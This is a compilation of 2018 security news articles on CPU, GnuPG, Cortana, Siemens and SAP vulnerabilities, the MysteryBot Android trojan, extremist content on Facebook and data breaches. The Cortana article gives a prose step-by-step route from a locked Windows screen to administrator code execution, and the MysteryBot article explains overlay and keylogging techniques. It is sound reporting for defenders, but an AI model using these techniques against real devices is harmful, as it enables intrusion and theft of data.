Intel confirms the CVE-2018-3665 vulnerability affects Core processors, but it claims the issue has been addressed by operating system and hypervisor software developers for many years, Intel urges vendors that still haven’t fixed the issue to do it as soon as possible by releasing necessary security updates.

Lazy FPU doesn’t affect systems using AMD or ARM processors, while Microsoft confirmed that “Lazy restore” is enabled by default in all versions of the operating system and cannot be disabled. Customers using the Azure platform are not affected by the problem.

LazyFP

Microsoft has yet to say exactly which versions of Windows are vulnerable, but the company noted that “Lazy restore” is enabled by default in all versions of the operating system and cannot be disabled. The tech giant assured customers that VMs running in Azure are not at risk.

“Is Lazy restore enabled by default and can it be disabled?

Lazy restore is enabled by default in Windows and cannot be disabled.” reads the FAQs published by Microsoft.

Recent versions of Linux kernel use Eager FPU this means that are not affected, while for older processors the flaw can be mitigated by enabling Eager FPU rebooting the kernel with the “eagerfpu=on” option.

AWS told its customers that its infrastructure is not affected.


Facebook Claims 99% of Extremist Content Removed Without Users' Help
15.6.2018 securityweek
Social

Facebook claims growing success in fight against extremist content

At this week's International Homeland Security Forum (IHSF) hosted in Jerusalem by Israel’s minister of public security, Gilad Erdan, Facebook claimed growing success in its battle to remove extremist content from the network.

Dr. Erin Marie Saltman, Facebook counterterrorism policy lead for EMEA, said, "On Terrorism content, 99% of terrorist content from ISIS and al-Qaida we take down ourselves, without a single user flagging it to us. In the first quarter of 2018 we took down 1.9 million pieces of this type of terrorist content."

This was achieved by a combination of Facebook staff and machine learning algorithms. "Focusing our machine learning tools on the most egregious terrorist content we are able to speak to scale and speed of efforts much more openly. But human review and operations is also always needed."

However, the implication that Facebook is winning the war against extremism is countered by a report ('Spiders of the Caliphate: Mapping the Islamic Stateís Global Support Network on Facebook' PDF) published in May 2018 by the Counter Extremism Project (CEP).

CEP was launched in 2014 by former U.S. government officials, including former Homeland Security adviser Frances Townsend, former Connecticut Senator Joseph Lieberman, and Mark Wallace, a former U.S. Ambassador to the United Nations.

Its report mapped 1,000 Facebook profiles explicitly supporting IS between October 2017 and March 2018. Using the open source network analysis and visualization program, Gephi, it found that visible 'friends' expanded the 1,000 nodes with 5,347 edges. Facebook's friending mechanism is particularly criticized as a means by which IS accounts find new targets to recruit.

The report actually refers to the 99% claim, implying that Saltman's claim is not a new development superseding the findings of CEP: "Given ISís ongoing presence on the platform, it is clear that Facebookís current content moderation systems are inadequate, contrary to the companyís public statements. Facebook has said that they remove 99% of IS and Al Qaeda content using automated systems..."

In fact, CEP fears that Facebook relies too heavily on its algorithms for finding and removing terrorist content. "This reliance on automated systems means IS supportersí profiles often go unremoved by Facebook and can remain on the platform for extended periods of time." It gives the example of a video from the IS Amaq news agency that was posted in September 2016 and remained available when the report was written in April 2018.

"The video depicts combat footage from the Battle of Mosul and shows how IS produced a variety of weapon systems including car bombs and rocket launchers," notes the report.

Another example describes an ISIS supporter friending a non-Muslim and then gradually radicalizing him during the six-month period. "ID 551 played a clear role in radicalizing ID 548 and recruiting him as an IS supporter," says the report. "Facebook was the platform that facilitated the process, and it also functioned as an IS news source for him. Furthermore, given his connections with existing IS networks on Facebook, the moment that ID 548 wishes to become more than an online supporter he has the necessary contacts available to him. These are individuals who can assist with traveling to fight for the group or staging an attack in America. This case provides a detailed insight into the scope to which IS has taken advantage of Facebookís half-measures to combating extremism online."

This is not a simple problem. Taking down suspect terrorist content that is posted and used legitimately is a direct infringement of U.S. users' First Amendment rights. Dr Saltman described this issue at the IHSF conference. "We see," she said, "that pieces of terrorist content and imagery are used by legitimate voices as well; activists and civil society voices who share the content to condemn it, mainstream media using imagery to discuss it within news segments; so, we need specialized operations teams with local language knowledge to understand the nuance of how some of this content is shared."

To help avoid freedom of speech issues, Facebook has made its enforcement process more transparent. "I am pleased to say," said Saltman, "that just last month we made the choice to proactively be more transparent about our policies, releasing much more information about how we define our global policies through our Comprehensive Community Standards. These standards cover everything from keeping safe online to how we define dangerous organizations and terrorism."

At the same time, appealing removal decisions is made easier and adjudicated by a human. This can be problematic. According to a January 2018 report in the Telegraph, an IS supporter in the UK who shared large amounts of IS propaganda had his account reactivated nine times by Facebook after he complained to the moderators that Facebook was stifling his free speech.

Where clearly illegal material is visible, Facebook cooperates proactively with law enforcement. Waheba Issa Dais, a Wisconsin 45-year-old mother of two, is in federal custody after being charged on Wednesday this week with providing 'material support or resources to a foreign terrorist organization.'

The Milwaukee Journal Sentinel reports, "The investigation appears to have started in January after Facebook security told the FBI that there was a 'Wisconsin-based user posting detailed instructions on how to make explosive vest bombs in support of ISIS,' the affidavit states. The person behind the Facebook posts, who the FBI said they determined was Dais, 'also appeared to be engaged in detailed question and answer sessions discussing substances used to make bombs'."

Ricin is mentioned. It would be easy enough for a word like 'ricin' to activate an alert. It is in the less obvious extremist content that machine learning algorithms need to be used. But machine learning is still a technology with great promise and partial delivery. "The real message is that Facebook has made it more difficult for ISIS and Al-Qaida to use their platform for recruiting," Ron Gula, president and co-founder of Gula Tech Adventures told SecurityWeek.

"Machine learning is great at recognizing patterns. Unfortunately, if the terrorists change their content and recruiting methods, they may still be able to leverage Facebook. This type of detection could turn into a cat and mouse game where terror organizations continuously change their tactics, causing Facebook to constantly have to update their rules and intelligence about what should be filtered."

The extremists won't make it easy. "They have become very good at putting a reasonable 'face' on much of their online recruiting material," explains John Dickson, Principal at the Denim Group. "Once they have someone interested is when they fully expose their intent. Given this situation, I’m not sure how [the algorithms] don’t create a ton of false positives and start taking down legitimate Islamic content."

Nearly every security activity creates false positives. "I suspect this will be no different," he continued. "Machine learning or more specifically supervised learning likely will help aid security analysts attempting to distinguish between legitimate jihadist recruiting material and generic Islamic content. But it will still need a human to make the final decisions – and that human is likely to be biased by the American attitude towards freedom of speech."

In the final analysis, Facebook is caught between competing demands: a very successful business model built on making 'friending' and posting easy, the First Amendment protecting free speech; and moral and legal demands to find and exclude disguised extremist needles hidden in a very large haystack of 2.2 billion active Facebook users every month.


New LokiBot-Linked Android Trojan Emerges
15.6.2018 securityweek Android

A newly discovered banking Trojan targeting Android 7 and 8 versions is using the same command and control (C&C) server as LokiBot, Threat Fabric (formerly known as SfyLabs) reports.

Dubbed MysteryBot, the new threat appears to be either an update for LokiBot or a brand new malware family from the same threat actor. It features improved commands compared to LokiBot, a new name, and modified network communication.

Although featuring generic Android banking Trojan functionalities, the new malware stands out in the crowd, courtesy of novel overlay, keylogging, and ransomware capabilities, researchers discovered.

The list of supported commands includes: call a given phone number, fetch contact list information, forward calls, copy all SMS messages, log keystrokes, encrypt files on external storage and delete all contacts, send an SMS message to all contacts, change default SMS app, call a USSD number, delete all SMS messages, and send SMS messages.

In addition to these capabilities, the Trojan can overlay phishing pages on top of legitimate applications, and uses a novel technique for that, to ensure success on Android 7 and 8 devices as well.

Restrictions in Security-Enhanced Linux (SELinux) and other security controls in new Android versions were meant to prevent malware from displaying fake windows over legitimate apps. The new technique leverages the Android PACKAGE_USAGE_STATS permission (Usage Access permission) to bypass the restrictions, and also abuses the AccessibilityService to get the permission.

Posing as an Adobe Flash Player app, the malware asks the victim to grant it the Usage Access permission, which enables its nefarious capabilities. The malware then attempts to monitor package names of the applications in the foreground. It targets over 100 applications with the overlays, including mobile banking and social platform apps.

MysteryBot also uses a new method of logging keystrokes: it calculates the location of the keys on the screen (it considers that each key has a set location on the screen), and places a different View over each of them (width and height of 0 pixels), which allows it to register which keys have been pressed.

The code, however, appears to be under development, as the malware doesn’t yet include the capability to send the logged keystrokes to the C&C server.

The malware also includes locker/ransomware capabilities, which are managed from a separate dashboard than the Trojan, the researchers reveal. MysteryBot can encrypt individually each file in the External Storage directory, and then delete the original files.

The malware places each file in a password-protected ZIP archive, but uses the same password for all archives (the key is generated during runtime). When completing the encryption, the malware displays a dialogue claiming the victim watched pornographic material and instructing them to contact the attacker via email.

The security researchers discovered that the passwords the malware uses are only 8 characters long, and that only characters of the Latin alphabet (upper and lower case) combined with numbers are used. Moreover, the IDs assigned to each victim can only be a number between 0 and 9,999, meaning that the same ID could actually be assigned to multiple victims.

“Although certain Android banking malware families such as but not limited to ExoBot 2.5, Anubis II, DiseaseBot have been exploring new techniques to perform overlay attacks on Android 7 and 8, it seems that the actor(s) behind MysteryBot have successfully implemented a workaround solution and have spent some time on innovation,” Threat Fabric concludes.


Meltdown-Like 'LazyFP' Vulnerability Impacts Intel CPUs
15.6.2018 securityweek
Vulnerebility

Intel and software vendors have started informing users about a new vulnerability involving side channel speculative execution that could be exploited by malicious actors to obtain sensitive information from the targeted system.

Dubbed LazyFP, the security hole is related to the floating point unit (FPU), also known as the math coprocessor. The FPU is used by the operating system when switching between processes – it saves the state of the current process and restores the state of the new process.

There are two types of switching, Lazy FPU and Eager FPU switching. Lazy FPU switching provides some benefits for performance, but on modern systems the gain has become negligible, which has led to an increasing use of Eager switching.

Researchers discovered recently that if the Lazy method is used, it may be possible for an attacker to access FPU state data, which can contain sensitive information, such as cryptographic keys.LazyFP vulnerability found in Intel processors

“System software may opt to utilize Lazy FP state restore instead of eager save and restore of the state upon a context switch. Lazy restored states are potentially vulnerable to exploits where one process may infer register values of other processes through a speculative execution side channel that infers their value,” Intel said in an advisory.

The vulnerability, tracked as CVE-2018-3665, is similar to Meltdown, specifically Variant 3a, but the issue has been assigned only a “medium” severity rating.

Julian Stecklina from Amazon Germany, Thomas Prescher from Cyberus Technology and Zdenek Sojka from SYSGO AG have been credited for finding the vulnerability. Colin Percival has also been credited, but the researcher says he only wrote an exploit for the flaw.

Cyberus has published a blog post for the LazyFP vulnerability, but it has withheld some details at Intel’s request.

Each advisory, blog post and discussion focusing on LazyFP provides some clues as to which systems may be affected.

Intel says the vulnerability affects its Core processors, which are marketed as Xeon for servers. The company claims the issue has been addressed by operating system and hypervisor software developers for many years, and vendors that are still impacted should release updates in the coming weeks.

Systems using AMD or ARM processors do not appear to be impacted. “Based on our analysis to-date, we do not believe our products are susceptible to the recent security vulnerability identified around lazy FPU switching,” AMD told SecurityWeek.

Microsoft has yet to say exactly which versions of Windows are vulnerable, but the company noted that “Lazy restore” is enabled by default in all versions of the operating system and cannot be disabled. The tech giant assured customers that VMs running in Azure are not at risk.

AWS told customers that its infrastructure is not affected, but advised them to ensure their operating systems are always up to date. The Xen Project says systems running any version of Xen are vulnerable.

In the case of Linux, recent versions of the kernel use Eager FPU. On systems using older processors, the vulnerability can be mitigated by booting the kernel with the “eagerfpu=on” parameter to enable Eager FPU. Red Hat, DragonflyBSD and OpenBSD have published advisories.


Cortana Flaw Allows for Code Execution from Lock Screen
15.6.2018 securityweek
Vulnerebility

One of the vulnerabilities Microsoft addressed with the June 2018 security patches was a flaw in Cortana that could allow an attacker to elevate privileges and execute code from the lock screen.

The issue, discovered by Cedric Cochin, Cyber Security Architect and Senior Principle Engineer at McAfee, is tracked as CVE-2018-8140. The bug can be abused to execute code on the impacted machine, directly from the lock screen.

In an advisory, Microsoft explains that the vulnerability “exists when Cortana retrieves data from user input services without consideration for status.” The company confirms the possible exploitation to execute commands with elevated permissions.

The vulnerability requires physical access to the impacted device and appears connected to a flaw independent researchers Amichai Shulman and Tal Be'ery detailed in March, and which could be abused to install malware on the affected computers.

In order to exploit the issue, an attacker with access to the impacted computer needs to have Cortana assistance enabled. A user can interact with the voice-based assistant even from the lock screen, by saying “Hey Cortana.”

Cortana can also be tricked to display search results with the contextual search menu, from the lock screen. This, however, requires the use of a keyboard-timing sequence: “any keystroke can trigger the menu from the time when Cortana begins to listen to when the answer is displayed.”

According to Cochin, because Windows indexes file content, including strings in documents, Cortana can be abused to leak sensitive information. Specifically, if the right search phrase is used when clicking on the “tap and say” button, Cortana could show the content of confidential files, such as those storing passwords.

“Armed with this knowledge, you can use your imagination to come up with specific keywords that could be used to start harvesting confidential information from the locked device,” the researcher notes.

Cortana attack leaks passwords

When hovering over a file in the search results provided by Cortana, the full path or content of the file would be displayed. When clicking on the file, it is launched using the appropriate program, but would only be accessible after the user logs in.

“At this point we can execute various preloaded Windows utilities such as calculator, but we cannot pass any parameters to the command line. We can open scripts including PowerShell, but instead of being executed, they will be opened in a text editor (notepad),” Cochin says.

Basically, “live off the land” attacks that abuse existing tools for malicious purposes cannot be performed because of a lack of parameters. Other nefarious operations, however, such as uninstalling applications, are possible even with these restrictions in place.

To execute code from the lock screen using Cortana, one would need to make sure the code is indexed (appears in the contextual menu). To get results to show up in the index of an authenticated user, an attacker can abuse OneDrive, where the contents of all shared folders with “edit” rights are indexed.

Thus, an attacker can drop an executable in the OneDrive folder, which can then even be executed as an administrator by simply right-clicking on it and selecting the “Run as administrator” option. Although a user account control (UAC) prompt could be triggered, the attack might still work, as users rarely check the content of the prompt before clicking through it.

Another option the attacker has is to use a non-portable executable (PE) malicious program, such as a PowerShell script. However, Cortana would only allow for the editing of such files, and would open them in Notepad instead of the default editor (PowerShell ISE).

When searching for txt, however, Cortana would display not only the text files, but also recently opened ones, such as the PowerShell script, and would provide a different contextual menu for them. Thus, an attacker could first edit the script, then search for txt, and simply select “Run with PowerShell” from the right-click menu.

“We now have local code execution with the payload of our choosing, without any exploit, even if the device is encrypted, on an up-to-date locked Windows 10 device. This technique helps us understand some of the differences between apps, documents, extensions, and the way Windows handles them from a locked or unlocked screen,” the security researcher explains.

Although code execution is now possible, there are limitations, as no command-line parameters can be passed. However, because it is possible to use the keyboard in addition to voice commands when interacting with Cortana from the lock screen, an attacker could use this to run the PowerShell code as an administrator.

“What can we do at this point? You name it. Our demo shows a password reset and login on a Windows 10 build, using only this simple technique,” the researcher notes.

To prevent exploitation of the vulnerability, even if it can only be abused with physical access to the vulnerable machine, one could turn off Cortana on the lock screen. Installing the recently released fixes for CVE-2018-8140 also mitigates the attack.


GnuPG Vulnerability Allows Spoofing of Message Signatures
15.6.2018 securityweek
Vulnerebility

GnuPG recently addressed an input sanitization vulnerability where a remote attacker could spoof arbitrary signatures.

Part of the GNU Project and also known as GPG, GnuPG is a complete and free implementation of the OpenPGP standard that enables the encryption and signing of data and communications. The hybrid-encryption software program has a versatile key management system and access modules for all kinds of public key directories.

Released earlier this month, GnuPG version 2.2.8 addresses CVE-2018-12020, a vulnerability affecting GnuPG, Enigmail, GPGTools and python-gnupg, Marcus Brinkmann, who discovered the bug, reveals. Brinkmann has dubbed the flaw SigSpoof.

“The signature verification routine in Enigmail 2.0.6.1, GPGTools 2018.2, and python-gnupg 0.4.2 parse the output of GnuPG 2.2.6 with a ‘--status-fd 2’ option, which allows remote attackers to spoof arbitrary signatures via the embedded ‘filename’ parameter in OpenPGP literal data packets, if the user has the verbose option set in their gpg.conf file,” he notes.

Status messages, GnuPG maintainer Werner Koch explains, are parsed by programs to get information from GPG about the validity of a signature. Status messages are created with the option “--status-fd N,” where N is a file descriptor. If N is 2, status messages and regular diagnostic messages share the stderr output channel.

The issue resides in the OpenPGP protocol allowing the inclusion of the file name of the original input file into a signed or encrypted message. The GnuPG tool can display a notice with that file name during decryption and verification, but it does not sanitize the file name, meaning that an attacker could include line feeds or other control characters in it.

Because of that, terminal control sequences could be injected, and the so-called status messages could be faked. Furthermore, the verification status of a signed email could also be faked.

“The attacker can inject arbitrary (fake) GnuPG status messages into the application parser to spoof signature verification and message decryption results. The attacker can control the key IDs, algorithm specifiers, creation times and user ids, and does not need any of the private or public keys involved,” Brinkmann explains.

He also notes that status messages need to fit into 255 characters, this being the limitation for the “name of the encrypted file” in OpenPGP.

Brinkmann also published a proof of concept to show how signatures can be spoofed in Enigmail and GPGTools, and another to show how both the signature and encryption can be spoofed in Enigmail. Signature spoofing is also possible on the command line, he demonstrated.

While disabled by default, verbose is included in several recommended configurations for GnuPG, and it is one of the main causes for this vulnerability.

According to the researcher, users should make sure they don’t have verbose in gpg.conf and should avoid using gpg --verbose on the command line. Developers are advised to add --no-verbose to all invocations of gpg.

“The vulnerability in GnuPG goes deep and has the potential to affect a large part of our core infrastructure. GnuPG is not only used for email security, but also to secure backups, software updates in distributions, and source code in version control systems like Git,” Brinkmann claims.


Siemens Patches Vulnerabilities in SCALANCE, Other Devices
15.6.2018 securityweek ICS

Siemens this week published five new security advisories describing several vulnerabilities discovered in its switches, routers, building automation products, and medical devices.

One of the advisories covers a high severity flaw that allows an unprivileged attacker to execute arbitrary code with elevated privileges by sending a specially crafted DHCP response to an affected device’s DHCP request. The attacker requires access to the local network segment that hosts the targeted device.

The security hole affects SCALANCE X switches, SCALANCE X-204RNA access points, RUGGEDCOM WiMAX private wireless WAN devices, and RFID 181-EIP and SIMATIC RF182C RFID communication modules.SCALANCE X switch vulnerability

Updates that patch the vulnerability are available for some SCALANCE X switches, while for the other products the vendor has advised customers to apply a series of mitigations that should prevent attacks.

Some SCALANCE X switches are also impacted by two cross-site scripting (XSS) flaws, including one that is persistent. Updates and mitigations are available for both security holes.

SCALANCE X switch vulnerability

Siemens also told customers that SCALANCE M875 industrial routers are impacted by six vulnerabilities. Three of them have been classified as high severity, including two command execution flaws that can be exploited by an authenticated attacker with admin privileges, and a cross-site request forgery (CSRF) bug.

The other flaws, rated “medium” severity, have been described as an arbitrary file download issue, an XSS vulnerability, and insecure storage of administrator passwords. Exploitation of all vulnerabilities requires access to the targeted device’s web interface and in some cases involves convincing the user to click on a link or visit a certain page.

The vulnerabilities have been addressed with the release of SCALANCE M876-4 routers, but users can also protect their devices against attacks by applying mitigations recommended by Siemens.

A separate advisory published this week by the automation giant describes two high severity flaws affecting Healthineers RAPID-Lab 1200 series and RAPIDPoint 400/405/500 Blood Gas Analyzers, medical devices used for blood sample analysis.

The weaknesses include a privilege escalation issue that can be exploited both locally and remotely, and the presence of a default account that allows attackers to access the device on TCP port 5900.

Siemens has also published an advisory for additional building automation products vulnerable to attacks due to the use of a Gemalto license management system (LMS).

The company said there was no evidence that any of these flaws had been exploited in the wild when the advisories were published.


Critical Flaws Patched in Schneider Building Automation Software
15.6.2018 securityweek ICS

Schneider Electric recently patched four vulnerabilities in its U.motion Builder software, including two critical command execution flaws. Advisories have been published by both the vendor and ICS-CERT.

Schneider Electric’s U.motion is a building automation solution used around the world mainly in the energy, critical manufacturing and commercial facilities sectors. U.motion Builder is a tool designed for creating projects for U.motion devices.

A Chinese researcher who uses the online moniker “bigric3” discovered that U.motion Builder is affected by a critical stack-based buffer overflow vulnerability (CVE-2018-7784).

“This exploit occurs when the submitted data of an input string is evaluated as a command by the application,” Schneider said in an advisory. “In this way, the attacker could execute code, read the stack, or cause a segmentation fault in the running application.”

Another critical flaw discovered by bigric3 is CVE-2018-7785, which has been described as a remote command injection issue that can lead to authentication bypass.

Both these security holes have been assigned CVSS scores of 10. They can be exploited remotely even by an attacker with a low skill level.

Register for SecurityWeek’s 2018 ICS Cyber Security Conference

Bigric3 has also been credited for finding a medium severity cross-site scripting (XSS) vulnerability in the U.motion Builder application.

Another flaw in U.motion Builder was discovered by Wei Gao of Ixia. The researcher found that the “improper validation of input of context parameter in an HTTP GET request” can lead to the disclosure of sensitive information. This issue has also been classified as having medium severity.

Schneider patched these vulnerabilities with the release of version 1.3.4. All prior versions are impacted.

In addition to the patch, ICS-CERT and the U.S. National Cybersecurity & Communications Integration Center (NCCIC) have provided a series of general recommendations for minimizing the risk of attacks.


Experts released a free decryptor for Everbe Ransomware
15.6.2018 securityaffairs
Ransomware   

Researchers have released a decryptor tool that could be used by victims of the Everbe Ransomware to decrypt their files for free.
Good news for the victims of the Everbe Ransomware, the popular malware researchers Michael Gillespie and Maxime Meignan have released a decryptor that could be used by victims to decrypt their files for free.

The Everbe Ransomware encrypts files and appends the .[everbe@airmail.cc].everbe, .embrace, or .pain extensions appended to the encrypted file’s name.

In order to decrypt the files, victims need to have an unencrypted version of an encrypted file, then they can use them to brute force the decryption key.

When the malware infects a machine, it drops a ransom note in each folder containing encrypted files. The note titled !=How_recovery_files=!.txt contains the instructions to start payment process, the victims must send an email everbe@airmail.cc for payment instructions.
Everbe Ransomware
Source Bleeping Computer

Now victims can use the InsaneCrypt Decryptor to restore their files, they have to select the menù item “Settings” and choose “Bruteforcer”.

In order to decrypt the files, it is necessary to provide the tool both encrypted and unencrypted versions of the files.

Everbe Ransomware
Source Bleeping Computer

Once the process is completed, the decryptor will have found the decryption key that the tool uses to restore files.

When the decryption process has finished, the decryptor will display a summary of the total amount of files that have been decrypted.

“Though your files are now decrypted, the original encrypted files will still be on your computer. Once you confirm that your files have been properly decrypted, you can use CryptoSearch to move all the encrypted files into one folder so you can delete or archive them.” explained Lawrence Abrams from BleepingComputer.com.


2018 Russia World Cup : Russian cyber spy may hack travelers’ mobile devices
15.6.2018 securityaffairs  CyberSpy  

According to a top US intelligence official, mobile phones of football fans traveling to Russia for the World Cup could be hacked by the Russian Intelligence.
Russia World Cup 2018 – Mobile devices and computers of football fans traveling to Russia could be hacked by the Russian Intelligence, the alert was issued by William Evanina, Director of the National Counterintelligence and Security Center.

The Top US official warned of massive surveillance operated by Russian authorities during the World Cup for security reason.

“Anyone traveling to Russia to attend the World Cup should be clear-eyed about the cyber risks involved,” Evanina said in a statement.

“If you’re planning on taking a mobile phone, laptop, PDA, or other electronic device with you — make no mistake — any data on those devices (especially your personally identifiable information) may be accessed by the Russian government or cyber criminals.”

2018 Russia World Cup

Every traveler attending the event in Russia should be a target of the Russian Intelligence, to prevent nation-state hackers compromise their devices the official suggests removing the battery when it is not in use.

“Corporate and government officials are most at risk, but don’t assume you’re too insignificant to be targeted.”


Analyzing the SAP June 2018 Security Patch Day
15.6.2018 securityaffairs
Vulnerebility   

SAP June 2018 Security Patch Day addresses two security notes, the company fixed five issues for previously released notes, including two critical flaws rated Hot News.
The most common flaw types are Cross-Site Scripting and Remote Command Execution, followed by implementation flaws and information disclosure.

“It seems that the downward trend in the number of monthly notes is continuing. This month, a total of 14 security notes has been released, with only seven notes published today. Seven notes in total (50%) are tagged as High Priority or Hot News.” reads the post published by Onapsis.

The two Hot News Security Notes received CVSS scores of 9.8 and 9.1, respectively, they affect SAP Business Client (version 6.5) and SAP BASIS (versions 7.31, 7.40, 7.50, 7.51, 7.65, 7.66).

The first update is related to a Security Note released on April 2018 Patch Day, it addresses third-party web browser controls delivered with SAP Business Client, while the latter is an update for a Note released on November 2016 Patch Day that addresses an OS command injection vulnerability in the Report for Terminology Export component.

SAP June 2018 Security Patch Day also addresses four High severity vulnerabilities and four Medium risk flaws.

“On 12th of June 2018, SAP Security Patch Day saw the release of 5 Security Notes. Additionally, there were 5 updates to previously released security notes.” states the SAP’s advisory.

The most severe high-risk flaw is an information disclosure vulnerability tracked as CVE-2018-2425 affects the SAP Business One- The flaw resides in the Business One version for the SAP HANA backup service and could be exploited by an attacker to access restricted information.

“[CVE-2018-2425] Information Disclosure in SAP Business One for SAP HANA Backup Service (#2588475): Business One is SAP’s more lightweight ERP system designed for small to medium-sized businesses. The vulnerability discussed in the note exists in the Business One version for SAP HANA, more specifically in its backup service.” continues the analysis published by Onapsis.

“The note does not contain many details, but mentions the vulnerability allows an attacker to access information which would otherwise be restricted. It does seem the sensitive information exists in the backup service logs. The fix implies updating your Business One component software.”

The SAP June 2018 Security Patch Day also addresses a remote command execution flaw tracked as CVE-2015-0899 that affects SAP Internet Sales and DoS issue tracked as CVE-2014-0050 that affects SAP Internet Sales.

SAP also addressed the CVE-2018-2408 flaw described as an improper session management bug in SAP Business Objects.


SigSpoof GnuPG flaw could be exploited to spoof message signatures
15.6.2018 securityaffairs  Safety  

GnuPG 2.2.8 released earlier this month addresses the CVE-2018-12020 vulnerability, dubbed SigSpoof, affecting GnuPG, Enigmail, GPGTools, and python-gnupg.
GnuPG, also known as GPG, is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows users to encrypt and sign data and communications.

GnuPG version 2.2.8 released earlier this month addresses the CVE-2018-12020 vulnerability, dubbed SigSpoof, affecting GnuPG, Enigmail, GPGTools, and python-gnupg.

“The signature verification routine in Enigmail 2.0.6.1, GPGTools 2018.2, and python-gnupg 0.4.2 parse the output of GnuPG 2.2.6 with a ‘–status-fd 2’ option, which allows remote attackers to spoof arbitrary signatures via the embedded ‘filename’ parameter in OpenPGP literal data packets, if the user has the verbose option set in their gpg.conf file,” reads the blog post published by Marcus Brinkmann who discovered the SigSpoof flaw.

The expert noticed that even if the verbose is disabled by default, it is included in several recommended configurations for GnuPG.

SigSpoof

Status messages are parsed by applications that get information from GPG about the validity of a signature.

“Status messages are created with the option “–status-fd N,” where N is a file descriptor. If N is 2, status messages and regular diagnostic messages share the stderr output channel.” explains GnuPG maintainer Werner Koch.

“The issue resides in the OpenPGP protocol allowing the inclusion of the file name of the original input file into a signed or encrypted message. The GnuPG tool can display a notice with that file name during decryption and verification, but it does not sanitize the file name, meaning that an attacker could include line feeds or other control characters in it.”

The lack of file name sanitization in GnuPG tool could be exploited by attackers to include line feeds or other control characters.s

An attacker can inject terminal control sequences and create fake status messages, it can also fake the verification status of a signed email.

“The attacker can inject arbitrary (fake) GnuPG status messages into the application parser to spoof signature verification and message decryption results. The attacker can control the key ids, algorithm specifiers, creation times and user ids, and does not need any of the private or public keys involved.” continues Brinkmann.

Brinkmann noticed that the limit for the file name of the encrypted file in OpenPGP is 255.

Brinkmann published a proof of concept to show to spoof signatures in both Enigmail and GPGTools, and a separate PoC to show how both the signature and encryption can be spoofed in Enigmail. The expert also demonstrated how to spoof a signature on the command line.

While disabled by default, verbose is included in several recommended configurations for GnuPG, and it is one of the main causes for this vulnerability.

To mitigate the issue, the researcher suggests to don’t include the verbose in gpg.conf and to avoid using gpg –verbose on the command line. Developers have to add –no-verbose option to all calls of the gpg.

Assessing the risks for critical infrastructure, the expert explained that the potential effect for this issue are severe.

“The vulnerability in GnuPG goes deep and has the potential to affect a large part of our core infrastructure. GnuPG is not only used for email security, but also to secure backups, software updates in distributions, and source code in version control systems like Git,” Brinkmann concludes.


European Parliament Votes to Ban Kaspersky Products
14.6.2018 securityweek BigBrothers  

Kaspersky Suspends Collaboration With Europol and NoMoreRansom

Kaspersky Lab has suspended its collaboration with Europol and the NoMoreRansom initiative after the European Parliament passed a resolution that describes the company’s software as being “malicious.”

Kaspersky is not trusted by some governments due to its alleged ties to Russian intelligence, which has sparked concerns that the company may be spying for Moscow.

The call for a ban on Kaspersky’s products in the European Union is part of a report on cyber defense written by Estonian MEP Urmas Paet of the Committee on Foreign Affairs.

The next-to-last proposal in the report “Calls on the EU to perform a comprehensive review of software, IT and communications equipment and infrastructure used in the institutions in order to exclude potentially dangerous programmes and devices, and to ban the ones that have been confirmed as malicious, such as Kaspersky Lab.”

The resolution was approved with 476 votes in favor and 151 against. In response, Kaspersky Lab’s founder and CEO, Eugene Kaspersky, said his company would be freezing collaboration with Europol and the NoMoreRansom project, and highlighted that the EU’s decision “welcomes cybercrime in Europe.”

Kaspersky is one of the private sector companies that founded NoMoreRansom, and it has helped Europol in several major cybercrime investigations, including a $1 billion cyber-heist.

“[It is] frustrating that there was no investigation, no evidence of any wrongdoing from our side, just references to false allegations from anonymous sources. This is the essence of media-ocracy: fake news → political decisions,” Eugene Kaspersky said on Twitter. “The risks of using our software are purely hypothetical. Just as hypothetical as with any other cybersecurity software of any country. But the risk of becoming a victim of a genuine cyberattack is real – and extremely high. Ergo: EP's political decision plays *for* cybercrime.”

Interestingly, an answer given in April by the European Commissioner for Digital Economy and Society, Mariya Gabriel, in response to a question from Polish politician Anna Fotyga regarding the risks associated with the use of Kaspersky software states that “the Commission has no indication for any danger associated with this anti-virus engine.”

On the other hand, Paet says he stands by his report. “These decisions must be taken seriously, they have not been taken out of the blue but instead have been drawn from various partners and intelligence sources. Considering the overall situation of EU-Russia relations, and Russia’s aggressive behaviour, we should not be taking risks that could cause serious damage to the EU,” he told EURACTIV after the vote.

The report is not legally binding, but it could influence some EU member states, especially since the U.K., the Netherlands and Lithuania have already moved to ban the use of Kaspersky software on sensitive systems. Kaspersky took legal action in the United States in an effort to overturn a decision to prohibit the use of its products by government agencies, but a judge rejected the lawsuit.

Many in the cybersecurity industry are skeptical of the accusations against Kaspersky, especially since no evidence of wrongdoing has been provided and many decisions related to the company appear to be based on media reports.

Reaction to EU vote to ban Kaspersky products

The security firm has been trying to clear its reputation, first by launching a transparency initiative that included giving partners access to source code, and more recently by announcing a move of core processes from Russia to Switzerland.


5.9 Million Card Details Accessed in Dixons Carphone Hack
14.6.2018 securityweek  Incindent 

Dixons Carphone, a household name in the UK, announced (PDF) today that it is investigating "unauthorised access to certain data held by the company." It describes this access as "an attempt to compromise 5.9 million cards in one of the processing systems of Currys PC World and Dixons Travel stores," and "1.2m records containing non-financial personal data, such as name, address or email address..."

This may turn out to be the biggest ever breach in the UK.

Right now, nothing has been disclosed on how the breach was effected, nor who might be the culprit. There are reports, however, that the incursion started almost a year ago in July 2017. With no technical details available, interest is focusing on why it took so long to discover the breach; how the company is handling the disclosure and notification; and whether the data protection regulator will consider the breach under the UK Data Protection Act 1998, or the EU's General Data Protection Regulation (GDPR) that came into effect on May 25.

The ICO's own statement gives nothing away. A spokesperson said, "It is early in the investigation. We will look at when the incident happened and when it was discovered as part of our work and this will inform whether it is dealt with under the 1998 or 2018 Data Protection Acts." For the latter, read 'GDPR' until the UK's Brexit takes effect.

The ambiguity arises because the breach occurred – or at least commenced – in pre-GDPR times. What we don't know is when Dixons Carphone discovered the breach. Since May 25 it will (probably) have been subject to the very strict GDPR breach notification rules.

If the whole incident is considered under GDPR rules, the ICO could potentially fine Dixons Carphone up to 4% of its annual global revenue. Last year the group reported total sales of £10.5 billion ($14 billion). A fine under GDPR could be many hundreds of millions of pounds. Under the Data Protection Act 1998, the maximum fine would be just £500,000 ($670,000).

